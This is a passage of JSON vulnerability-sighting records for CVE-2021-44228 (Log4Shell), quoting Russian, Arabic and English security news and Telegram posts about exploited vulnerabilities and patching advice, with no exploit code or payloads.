remote code execution vulnerability via the ldap JNDI parser. If your are a Burp Bounty Pro user, you can download now the profile at: https://t.co/2lXRz3gwkQ\n\u2014 DragonJAR - Seguridad Inform\u00e1tica (@DragonJAR) Dec 10, 2021", "creation_timestamp": "2021-12-13T21:26:15.000000Z"}, {"uuid": "857aebfd-d2a7-4d6e-bebf-0de255986d7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/kasperskyb2b/454", "content": "\u0414\u0430\u0439\u0434\u0436\u0435\u0441\u0442 \u043d\u043e\u0432\u043e\u0441\u0442\u0435\u0439 \u0437\u0430 \u043f\u0440\u043e\u0448\u0435\u0434\u0448\u0443\u044e \u043d\u0435\u0434\u0435\u043b\u044e\n\n\ud83d\udee0 \u041e\u043f\u0430\u0441\u043d\u044b\u0435 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438: GitHub \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442 \u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u0442\u044c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043f\u043e \u0434\u0435\u0441\u044f\u0442\u043a\u0430\u043c (\u0443\u0436\u0435 \u0431\u043e\u043b\u0435\u0435 30) npm-\u043f\u0430\u043a\u0435\u0442\u043e\u0432, \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c. \u0422\u0435\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0435\u043c, \u043d\u0430 \u0441\u0430\u0439\u0442\u0435 PyPI \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u0431\u043e\u043b\u0435\u0435 450 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0445 Python-\u043f\u0430\u043a\u0435\u0442\u043e\u0432, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u044b\u0442\u0430\u044e\u0442\u0441\u044f \u0432\u043e\u0440\u043e\u0432\u0430\u0442\u044c \u043a\u0440\u0438\u043f\u0442\u043e\u0432\u0430\u043b\u044e\u0442\u0443, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043d\u043e\u0432\u044b\u0439 \u043d\u0430\u0431\u043e\u0440 \u043f\u0430\u043a\u0435\u0442\u043e\u0432 \u0441\u043e \u0441\u0442\u0438\u043b\u0435\u0440\u043e\u043c W4SP, \u043e \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u043c\u044b \u043f\u0438\u0441\u0430\u043b\u0438 \u0432 \u0430\u0432\u0433\u0443\u0441\u0442\u0435.\n\n\ud83d\ude12 ProxyShell \u0438 Log4j \u043f\u043e-\u043f\u0440\u0435\u0436\u043d\u0435\u043c\u0443 \u043f\u043e\u043c\u043e\u0433\u0430\u044e\u0442 \u0445\u0430\u043a\u0435\u0440\u0430\u043c. \u0424\u0440\u0430\u043d\u0446\u0443\u0437\u0441\u043a\u0438\u0439 \u0418\u0411-\u0440\u0435\u0433\u0443\u043b\u044f\u0442\u043e\u0440 ANSSI \u0432\u044b\u043b\u043e\u0436\u0438\u043b \u0430\u043d\u0433\u043b\u043e\u044f\u0437\u044b\u0447\u043d\u0443\u044e \u0432\u0435\u0440\u0441\u0438\u044e \u0441\u0432\u043e\u0435\u0433\u043e \u043e\u0442\u0447\u0451\u0442\u0430 \u0437\u0430 2022 \u0433\u043e\u0434. \u0421\u0440\u0435\u0434\u0438 \u043f\u0440\u0435\u0434\u0441\u043a\u0430\u0437\u0443\u0435\u043c\u044b\u0445 \u0432\u044b\u0432\u043e\u0434\u043e\u0432 \u043f\u0440\u043e ransomware, \u0445\u0430\u043a\u0442\u0438\u0432\u0438\u0441\u0442\u043e\u0432 \u0438 \u0431\u043e\u0442\u043e\u0432\u043e\u0434\u043e\u0432, \u0432\u044b\u0434\u0435\u043b\u044f\u0435\u0442\u0441\u044f \u043e\u0434\u0438\u043d \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u043f\u0435\u0447\u0430\u043b\u044c\u043d\u044b\u0439: \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445 \u043d\u0430 \u0444\u0440\u0430\u043d\u0446\u0443\u0437\u0441\u043a\u0438\u0439 \u0431\u0438\u0437\u043d\u0435\u0441 \u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0430\u043c \u0447\u0430\u0449\u0435 \u0432\u0441\u0435\u0433\u043e \u0443\u0434\u0430\u0451\u0442\u0441\u044f \u043f\u0440\u043e\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0441\u0442\u0430\u0440\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0441 \u0434\u0430\u0432\u043d\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u043c\u0438 \u043f\u0430\u0442\u0447\u0430\u043c\u0438. \u0412 \u0442\u043e\u043f-10 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043d\u0430 \u043f\u0435\u0440\u0432\u044b\u0445 \u0434\u0432\u0443\u0445 \u043c\u0435\u0441\u0442\u0430\u0445 \u043e\u0431\u043e\u0441\u043d\u043e\u0432\u0430\u043b\u0438\u0441\u044c CVE-2021-34473 \u0438 CVE-2021-44228, \u0430 \u0432\u0441\u0435\u0433\u043e Exchange-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0437\u0430\u043d\u044f\u043b\u0438 4 \u043c\u0435\u0441\u0442\u0430 \u0438\u0437 10. \u0422\u0430\u043a\u0436\u0435 \u0441\u0440\u0435\u0434\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u043e\u0432: Apache, GLPI, Zimbra \u0438 VMware. \n\n\u203c\ufe0f \u0410\u0442\u0430\u043a\u0438 ESXiArgs \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0442\u0441\u044f. \u0421\u0443\u0434\u044f \u043f\u043e \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u043c \u043e\u0442\u0447\u0451\u0442\u0430\u043c, \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0438 \u043f\u043e\u0440\u0430\u0437\u0438\u043b\u0438 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0441 \u043e\u0442\u043a\u043b\u044e\u0447\u0451\u043d\u043d\u044b\u043c OpenSLP, \u0442\u043e \u0435\u0441\u0442\u044c \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438. \u0422\u0430\u043a\u0436\u0435 \u0443\u0441\u043e\u0432\u0435\u0440\u0448\u0435\u043d\u0441\u0442\u0432\u043e\u0432\u0430\u043d\u043d\u0430\u044f \u0430\u0442\u0430\u043a\u0430 \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0435\u0439 \u043f\u0440\u0435\u043f\u044f\u0442\u0441\u0442\u0432\u0443\u0435\u0442  \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044e \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0445 \u043c\u0430\u0448\u0438\u043d \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0440\u0430\u043d\u0435\u0435 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432. \u0412 \u0441\u0435\u0442\u0438 \u043f\u043e-\u043f\u0440\u0435\u0436\u043d\u0435\u043c\u0443 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u0434\u0435\u0441\u044f\u0442\u043a\u0438 \u0442\u044b\u0441\u044f\u0447 \u043c\u0430\u0448\u0438\u043d \u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0435\u0439 VMware ESXi.\n\n\ud83d\udc1f Reddit \u043e\u0442\u0447\u0438\u0442\u0430\u043b\u0441\u044f \u043e\u0431 \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u043c \u0432\u0437\u043b\u043e\u043c\u0435.  \u0421\u0443\u0434\u044f \u043f\u043e \u0432\u0441\u0435\u043c\u0443, \u0444\u0438\u0448\u0435\u0440\u044b \u0432\u044b\u043c\u0430\u043d\u0438\u043b\u0438 \u043e\u0431\u0430 \u0444\u0430\u043a\u0442\u043e\u0440\u0430 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0443 \u043e\u0434\u043d\u043e\u0433\u043e \u0438\u0437 \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u043e\u0432 \u0438 \u0441\u043c\u043e\u0433\u043b\u0438 \u0441\u0442\u0430\u0449\u0438\u0442\u044c \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u043e\u0431\u044a\u0451\u043c \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0435\u0439 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0438 \u0438 \u0438\u0441\u0445\u043e\u0434\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430. \u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0438 \u043f\u0430\u0440\u043e\u043b\u0438, \u043f\u043e \u0442\u0435\u043a\u0443\u0449\u0435\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438, \u043d\u0435 \u043f\u043e\u0441\u0442\u0440\u0430\u0434\u0430\u043b\u0438, \u043d\u043e \u043e\u0441\u0442\u0430\u0451\u0442\u0441\u044f \u0432\u043e\u043f\u0440\u043e\u0441, \u043a\u0430\u043a\u0438\u0435 \u00ab\u043f\u043e\u043b\u0435\u0437\u043d\u044b\u0435\u00bb \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0430\u0439\u0434\u0443\u0442\u0441\u044f \u0432 \u0438\u0441\u0445\u043e\u0434\u043d\u043e\u043c \u043a\u043e\u0434\u0435. \n\n\ud83d\udea7 \u041a\u0430\u0436\u0434\u0430\u044f \u043f\u044f\u0442\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0438\u043d\u0434\u0443\u0441\u0442\u0440\u0438\u0430\u043b\u044c\u043d\u043e\u043c \u043e\u0431\u043e\u0440\u0443\u0434\u043e\u0432\u0430\u043d\u0438\u0438 \u043d\u0435 \u0438\u043c\u0435\u0435\u0442 \u043f\u0430\u0442\u0447\u0430. \u041f\u0430 \u0438\u0442\u043e\u0433\u0430\u043c \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 ICS, \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0432 \u0431\u0430\u0437\u0435 \u0434\u0430\u043d\u043d\u044b\u0445 CISA \u0437\u0430 2020-2022 \u0433\u043e\u0434\u044b, 21% \u0442\u0430\u043a \u0438 \u043d\u0435 \u0431\u044b\u043b\u0438 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u044b \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u0435\u043c. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u0447\u0438\u0441\u043b\u043e \u0431\u044e\u043b\u043b\u0435\u0442\u0435\u043d\u0435\u0439 \u0441 2020 \u043f\u043e 2021 \u0433\u043e\u0434 \u0432\u044b\u0440\u043e\u0441\u043b\u043e \u043d\u0430 67%.\n\n\ud83e\udd16 \u042d\u0442\u043e \u043d\u0435 \u0418\u0411-\u043d\u043e\u0432\u043e\u0441\u0442\u044c (\u043f\u043e\u043a\u0430), \u043d\u043e \u043f\u0440\u043e\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0435\u0451 \u043d\u0435\u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e. Microsoft \u0438 Google \u0430\u043d\u043e\u043d\u0441\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0441\u0432\u043e\u0438 \u043f\u043b\u0430\u043d\u044b \u043f\u043e \u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0446\u0438\u0438 \u044f\u0437\u044b\u043a\u043e\u0432\u044b\u0445 \u043c\u043e\u0434\u0435\u043b\u0435\u0439 (\u043f\u0440\u043e\u0449\u0435 \u0433\u043e\u0432\u043e\u0440\u044f, \u0447\u0430\u0442\u0431\u043e\u0442\u043e\u0432) ChatGPT \u0438 Bard \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0439 \u0431\u0438\u0437\u043d\u0435\u0441. \u041f\u043e\u043a\u0430 \u043e\u0447\u0435\u0432\u0438\u0434\u043d\u043e, \u0447\u0442\u043e Microsoft \u0438 OpenAI \u0433\u043e\u0442\u043e\u0432\u0438\u043b\u0438\u0441\u044c \u0434\u043e\u043b\u044c\u0448\u0435, \u0438 \u043f\u043b\u0430\u043d \u043f\u0440\u043e\u0440\u0430\u0431\u043e\u0442\u0430\u043d \u0433\u043b\u0443\u0431\u0436\u0435. \u0422\u0430\u043a\u0436\u0435 \u043e\u0447\u0435\u0432\u0438\u0434\u043d\u043e, \u0447\u0442\u043e \u0432\u0441\u0435 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0438, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u0442\u0435\u043a\u0441\u0442\u043e\u043c \u2013 \u043e\u0442 \u043f\u043e\u0438\u0441\u043a\u0430 \u0434\u043e \u0444\u0438\u0448\u0438\u043d\u0433\u0430 \u2013 \u0440\u0435\u0432\u043e\u043b\u044e\u0446\u0438\u043e\u043d\u043d\u043e \u0438\u0437\u043c\u0435\u043d\u044f\u0442\u0441\u044f \u0432 \u0431\u043b\u0438\u0436\u0430\u0439\u0448\u0438\u0435 \u0433\u043e\u0434\u044b. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u00ab\u0433\u0430\u043b\u043b\u044e\u0446\u0438\u043d\u0430\u0446\u0438\u0439\u00bb (\u0442\u043e \u0435\u0441\u0442\u044c \u0441\u0432\u044f\u0437\u043d\u043e \u0438\u0437\u043b\u043e\u0436\u0435\u043d\u043d\u043e\u0439, \u043d\u043e \u0444\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043d\u0435\u0432\u0435\u0440\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438) \u043f\u043e\u043a\u0430 \u043d\u0435 \u0440\u0435\u0448\u0435\u043d\u0430 \u043d\u0438 \u043e\u0434\u043d\u0438\u043c \u0438\u0437 \u0438\u0433\u0440\u043e\u043a\u043e\u0432. \n\n#\u043d\u043e\u0432\u043e\u0441\u0442\u0438", "creation_timestamp": "2023-02-13T10:17:05.000000Z"}, {"uuid": "b01f8c88-82f7-4eb0-bd38-d1ee7d4bc033", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/ggfcvj/2971", "content": "\u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 CVE-2021-44228 \u0641\u064a \u0645\u0643\u062a\u0628\u0629 Apache Log4j\n\nhttps://securelist.ru/cve-2021-44228-vulnerability-in-apache-log4j-library/104144/\n\n#My_pride_is_crazy #The_Yemeni_ghost", "creation_timestamp": "2021-12-19T16:48:43.000000Z"}, {"uuid": "ce9d4a87-c0cd-4619-b184-e4998ff308c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/kasperskyb2b/786", "content": "\u2705 \u0413\u043b\u0430\u0432\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438: \u043e\u0442\u0447\u0451\u0442 CISA \u0438 \u0438\u0445 \u0430\u043d\u0433\u043b\u043e\u044f\u0437\u044b\u0447\u043d\u044b\u0445 \u0441\u043e\u044e\u0437\u043d\u0438\u043a\u043e\u0432\n\n\u0412 \u0441\u0435\u0440\u0435\u0434\u0438\u043d\u0435 \u0433\u043e\u0434\u0430 \u0432\u044b\u0445\u043e\u0434\u044f\u0442 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0445 \u043e\u0442\u0447\u0451\u0442\u043e\u0432, \u043f\u043e\u0441\u0432\u044f\u0449\u0435\u043d\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c. \u041d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u044e\u0442 2022 \u0433\u043e\u0434, \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u2014 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 12 \u043c\u0435\u0441\u044f\u0446\u0435\u0432, \u043d\u043e \u0432 \u043b\u044e\u0431\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u043e\u043d\u0438 \u0434\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u043f\u043e\u0443\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u044b \u0438 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u043d\u044b. \u041d\u0430\u0447\u043d\u0451\u043c \u0441 \u0431\u043e\u043b\u044c\u0448\u043e\u0433\u043e \u043e\u0442\u0447\u0451\u0442\u0430 \u00ab\u043f\u044f\u0442\u0438\u0433\u043b\u0430\u0437\u044b\u0445\u00bb, \u043f\u043e\u0441\u0432\u044f\u0449\u0451\u043d\u043d\u043e\u0433\u043e \u0433\u043b\u0430\u0432\u043d\u044b\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0441\u0442\u043e\u044f\u043d\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445 \u043d\u0430 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438. \n\n\u0413\u043b\u0430\u0432\u043d\u044b\u0439 \u0432\u044b\u0432\u043e\u0434 \u043d\u0435 \u043d\u043e\u0432 \u2014 \u0441\u0430\u043c\u044b\u0435 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0435 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f 0day \u0438\u043b\u0438 1day. \u042d\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0435 \u0433\u043e\u0434 \u0438\u043b\u0438 \u0434\u0432\u0430, \u0438\u043c\u0435\u044e\u0449\u0438\u0435 PoC \u043d\u0430 Github, \u0434\u0430\u0432\u043d\u043e \u0437\u0430\u043a\u0440\u044b\u0442\u044b\u0435 \u043f\u0430\u0442\u0447\u0430\u043c\u0438, \u043d\u043e \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u0432\u0441\u0451 \u0440\u0430\u0432\u043d\u043e \u043d\u0435 \u043b\u0438\u043a\u0432\u0438\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0442\u044b\u0441\u044f\u0447\u0430\u043c\u0438 \u0441\u0438\u0441\u0430\u0434\u043c\u0438\u043d\u043e\u0432 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443.  \u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043d\u0435 \u043d\u0440\u0430\u0432\u0438\u0442\u0441\u044f \u0442\u0440\u0443\u0434\u043d\u0430\u044f \u0440\u0430\u0431\u043e\u0442\u0430, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043e\u043d\u0438 \u043f\u0440\u0435\u0434\u043f\u043e\u0447\u0438\u0442\u0430\u044e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u0445, \u0438\u043c\u0435\u044e\u0449\u0438\u0445 \u0432\u0441\u0435\u043c\u0438\u0440\u043d\u043e\u0435 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u0435 \u0432\u043e \u0432\u0441\u0435\u0445 \u0438\u043d\u0434\u0443\u0441\u0442\u0440\u0438\u044f\u0445.\n\n\u0422\u043e\u043f-12 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439: CVE-2018-13379 \u0432 Fortinet SSL VPN, \u0442\u0440\u0438 CVE 2021 \u0433\u043e\u0434\u0430, \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u0435 ProxyShell, CVE-2021-40539 \u0432 Zoho ManageEngine, CVE-2021-26084 \u0438 -26134 \u0432 Confluence, CVE-2021-44228 Log4Shell, CVE-2022-22954 \u0438 -22960 \u0432 VMWare, CVE-2022-1388 \u0432 F5 BIG-IP,  CVE-2022-30190 \u0432 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0435 \u0442\u0435\u0445\u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0438 Windows, MSDT.\n\n\u0415\u0449\u0451 \u0442\u0440\u0438 \u0434\u0435\u0441\u044f\u0442\u043a\u0430 \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u2014 \u0432 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u043d\u043e\u043c \u043e\u0442\u0447\u0451\u0442\u0435 (\u0430\u043d\u0433\u043b). \u0422\u0430\u043c \u0436\u0435 \u0434\u0430\u043d\u044b \u0434\u0435\u0442\u0430\u043b\u044c\u043d\u044b\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u044f\u043c \u043f\u043e \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439. \u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u0440\u0430\u0437\u0434\u0435\u043b\u0435\u043d\u044b \u043d\u0430 \u043f\u043e\u043d\u044f\u0442\u043d\u044b\u0435 \u0433\u0440\u0443\u043f\u043f\u044b:\n\n\ud83d\udd18\u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c\u0438 \u0438 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0435\u0439\n\ud83d\udd18\u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c \u0438 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0435\u0439\n\ud83d\udd18\u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b \u0437\u0430\u0449\u0438\u0442\u044b \u0438 \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u0430\u044f \u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440\u0430 \u0441\u0435\u0442\u0438\n\ud83d\udd18\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c \u0446\u0435\u043f\u043e\u0447\u043a\u0438 \u043f\u043e\u0441\u0442\u0430\u0432\u043e\u043a.\n\n#\u043d\u043e\u0432\u043e\u0441\u0442\u0438 #\u0441\u043e\u0432\u0435\u0442\u044b @\u041f2\u0422", "creation_timestamp": "2023-08-07T10:20:52.000000Z"}, {"uuid": "fef7a4df-1b7d-438a-b7fa-34e881d84a32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/komissar_katani/98053", "content": "\u0422\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043d\u0430 \u043f\u0440\u043e\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u0435 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 Apache log4j\n\n Log4jshell CVE-2021-44228 \u0418\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441 JNDI \u0432 Apache Log4j2 2.0-beta9 (\u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438 2.14.1) \u0432 \u043a\u043e\u043c\u0431\u0438\u043d\u0430\u0446\u0438\u0438 \u0441 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u043e\u043c LDAP \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u043e\u0442\u043a\u0443\u0434\u0430 \u0443\u0433\u043e\u0434\u043d\u043e. \u0425\u0430\u043a\u0435\u0440 \u043c\u043e\u0436\u0435\u0442 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f\u043c\u0438 \u0436\u0443\u0440\u043d\u0430\u043b\u0430 \u0438\u043b\u0438 \u0438\u0445 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u043c\u0438 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434, \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0439 \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 LDAP. CVE-2021-45046 \u0411\u044b\u043b\u043e \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043e, \u0447\u0442\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0430\u0434\u0440\u0435\u0441\u0430 CVE-2021-44228 \u0432 Apache Log4j 2.15.0 \u0431\u044b\u043b\u043e \u043d\u0435\u043f\u043e\u043b\u043d\u044b\u043c \u043f\u0440\u0438 \u0432\u044b\u0431\u043e\u0440\u0435 \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043a \u043d\u0435 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e. \u0415\u0441\u043b\u0438 \u043f\u0440\u0438 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0436\u043e\u043d\u0433\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f 